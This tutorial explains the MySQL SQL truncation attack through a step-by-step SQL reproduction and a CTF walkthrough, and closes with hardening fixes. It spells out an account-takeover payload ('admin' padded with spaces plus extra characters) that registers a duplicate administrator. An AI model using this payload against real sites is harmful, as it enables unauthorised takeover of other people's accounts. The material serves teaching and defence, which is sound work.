In this article we will learn about the SQL truncation attack.
What is a SQL truncation attack?
SQL truncation is an interesting database bug. Successful exploitation results in account compromise: an attacker can log in to an existing account, such as the administrator's, with a password of their own choosing. Sounds interesting!
First, let's see why the problem occurs in the database. If the application does not validate the length of user input, the database may silently cut it down to the column width. For the rest of this section, assume MySQL is running in a non-strict SQL mode, the administrator account is named admin, and the username column is limited to 20 characters (for example VARCHAR(20)). Note that since MySQL 5.7 STRICT_TRANS_TABLES is enabled by default, which turns the silent truncation described below into an error; the attack relies on that strictness being switched off.
What happens in the backend database? In non-strict mode MySQL truncates strings longer than the column's defined width and only issues a warning. Those warnings are visible in the database session, not in the web application, so they go unhandled. In addition, MySQL does not compare strings byte for byte by default: non-binary collations use looser matching rules.
One of these relaxations is that trailing spaces are ignored during comparison (the so-called PAD SPACE collations). This means that "admin" followed by fifteen spaces is still equal to "admin" in the database, and that is why the application refuses to register a second user called "admin": its duplicate check finds the existing row. But if the attacker supplies "admin", fifteen spaces, and then "ninja" (25 characters in total), the application's lookup for that exact string finds no user, because no stored username matches it, so the application accepts the new username and inserts it. The column holds only 20 characters, so MySQL truncates the value to "admin" plus fifteen spaces, which compares equal to "admin". The table now contains two administrators: "admin" and "admin" padded with trailing spaces.
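The following MySQL session is an added example that is not part of the original article; it reproduces the mechanism described above. The table and column names (users, username, password) and the stored password values are assumptions made for the demonstration. The column is pinned to utf8mb4_general_ci because that collation is PAD SPACE; MySQL 8.0's default utf8mb4_0900_ai_ci is NO PAD, under which trailing spaces are significant and the comparison in step 3 would not match.

```sql
-- Added example (not from the original article): reproducing SQL truncation in
-- MySQL. Table/column names are assumptions. sql_mode is cleared so the server
-- truncates with a warning instead of raising an error (non-strict mode).
SET SESSION sql_mode = '';

CREATE TABLE users (
  id       INT AUTO_INCREMENT PRIMARY KEY,
  -- PAD SPACE collation: trailing spaces are ignored when comparing values.
  username VARCHAR(20) NOT NULL
           CHARACTER SET utf8mb4 COLLATE utf8mb4_general_ci,
  -- Stored in the clear only to keep the demonstration short.
  password VARCHAR(64) NOT NULL
);

-- The pre-existing administrator account.
INSERT INTO users (username, password) VALUES ('admin', 'admin');

-- Step 1: the registration form checks whether the requested username exists.
-- 'admin' + 15 spaces + 'ninjasecurity' is 33 characters; no stored row equals it.
SELECT COUNT(*) AS taken
  FROM users
 WHERE username = 'admin               ninjasecurity';   -- taken = 0

-- Step 2: the application therefore inserts the new user. MySQL cuts the value
-- to the column width (20 characters: 'admin' plus 15 spaces) and only warns.
INSERT INTO users (username, password)
VALUES ('admin               ninjasecurity', 'pass@123');
SHOW WARNINGS;   -- Warning 1265: Data truncated for column 'username' at row 1

-- Step 3: VARCHAR keeps the trailing spaces, but the PAD SPACE collation ignores
-- them in comparisons, so the stored 20-character value matches 'admin'.
SELECT id,
       CONCAT('[', username, ']') AS stored,
       CHAR_LENGTH(username)     AS len
  FROM users
 WHERE username = 'admin';
-- id | stored                   | len
--  1 | [admin]                  |   5
--  2 | [admin               ]   |  20

-- Step 4: a login that matches username = 'admin' together with the attacker's
-- password now succeeds against the second row.
SELECT id
  FROM users
 WHERE username = 'admin' AND password = 'pass@123';   -- returns id 2
```

The two things that have to line up are the silent truncation in step 2 and the padded comparison in step 3; removing either one (strict mode, or a NO PAD or binary collation) breaks the attack.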
Now let's look at a practical scenario. There was a recent CTF challenge at http://ctf.notsosecure.com/ whose first flag required a SQL truncation attack.
We opened the URL and found the login page.
Our first attempt was to check for default credentials. We tried the username admin with the password admin and logged in successfully.
What just happened? That was our reaction, but this is an online hosted challenge, so someone had already created that admin password. Our goal, however, is to gain admin access with credentials of our own, which means we first need to register a user in this application.
We logged out from the application and found the register link on that page.
So we registered a user through this form and then logged in to the application.
You will now see a message saying "you are not an administrator". We need to compromise the admin account. We already know that a default administrator account exists; next we check whether the username has a length limit. We verify that a username of 20 characters can be registered: the application accepts up to 20 characters and silently drops the rest. So a truncation attack is possible here. We therefore register another user with the username "admin" followed by 15 spaces and then "ninjasecurity" (33 characters in total) and the password pass@123.
The application keeps only the first 20 characters, and the remainder, "ninjasecurity", is discarded. The value inserted into the database is "admin" followed by 15 spaces, which MySQL treats as equal to "admin".
Our user is successfully registered.
Now we try to log in as admin with the password pass@123 and boom! We are logged in.
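For contrast, here is the same schema hardened so that the registration used in the challenge is rejected. This is an added example, not code from the article or the CTF; the table and column names and the placeholder hash values are assumptions.

```sql
-- Added example (not from the original article): three independent fixes, each
-- of which defeats the truncation trick on its own. Names are assumptions.
SET SESSION sql_mode = 'STRICT_TRANS_TABLES';   -- the default since MySQL 5.7

CREATE TABLE users_hardened (
  id            INT AUTO_INCREMENT PRIMARY KEY,
  username      VARCHAR(20) NOT NULL
                CHARACTER SET utf8mb4 COLLATE utf8mb4_general_ci,
  password_hash VARCHAR(255) NOT NULL,           -- store a password hash, never the password
  UNIQUE KEY uq_username (username)              -- fix 2: uniqueness enforced by the database
);

INSERT INTO users_hardened (username, password_hash) VALUES ('admin', '<hash-placeholder>');

-- Fix 1: strict mode. The over-long value is rejected instead of truncated, so
-- the application never gets a silently shortened row.
INSERT INTO users_hardened (username, password_hash)
VALUES ('admin               ninjasecurity', '<hash-placeholder>');
-- ERROR 1406 (22001): Data too long for column 'username' at row 1

-- Fix 2: unique index. Even if the application trimmed the input to 20
-- characters itself, the index compares with the column's PAD SPACE collation,
-- so 'admin' plus 15 spaces collides with the existing 'admin'.
INSERT INTO users_hardened (username, password_hash)
VALUES ('admin               ', '<hash-placeholder>');
-- ERROR 1062 (23000): Duplicate entry 'admin               ' for key 'uq_username'
-- (MySQL 8.0 prefixes the key name with the table name)

-- Fix 3: validate the input before it reaches the INSERT. Expressed in SQL for
-- illustration; the same check belongs in the application. Note that
-- "@u = TRIM(@u)" would NOT detect trailing spaces, because = itself ignores
-- them under a PAD SPACE collation; compare lengths instead.
SET @u = 'admin               ninjasecurity';
SELECT CHAR_LENGTH(@u) <= 20
       AND CHAR_LENGTH(@u) = CHAR_LENGTH(TRIM(@u)) AS acceptable;   -- 0: reject
SET @u = 'admin               ';
SELECT CHAR_LENGTH(@u) <= 20
       AND CHAR_LENGTH(@u) = CHAR_LENGTH(TRIM(@u)) AS acceptable;   -- 0: reject
SET @u = 'ninjasecurity';
SELECT CHAR_LENGTH(@u) <= 20
       AND CHAR_LENGTH(@u) = CHAR_LENGTH(TRIM(@u)) AS acceptable;   -- 1: accept
```

Of the three, the unique index is the one that still protects you when a later schema or configuration change quietly re-enables truncation, so it is worth having even where strict mode is already on.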